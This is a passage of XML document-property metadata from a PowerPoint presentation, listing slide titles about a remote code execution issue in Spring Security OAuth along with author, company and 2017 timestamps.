      <vt:lpstr>Remote code execution</vt:lpstr>
      <vt:lpstr>Remote code execution</vt:lpstr>
      <vt:lpstr>Remote code execution</vt:lpstr>
      <vt:lpstr>Affected version </vt:lpstr>
      <vt:lpstr>FIX</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>RCE IN SPRING SECURITY OAUTH 1&amp;2</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company>EMC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2016 POWERPOINT TEMPLATES (2/16)</dc:title>
  <dc:subject/>
  <dc:creator>Трофимов Владислав</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Трофимов Владислав</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <cp:lastPrinted>2015-08-06T17:35:06Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-30T21:34:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-30T22:22:29Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>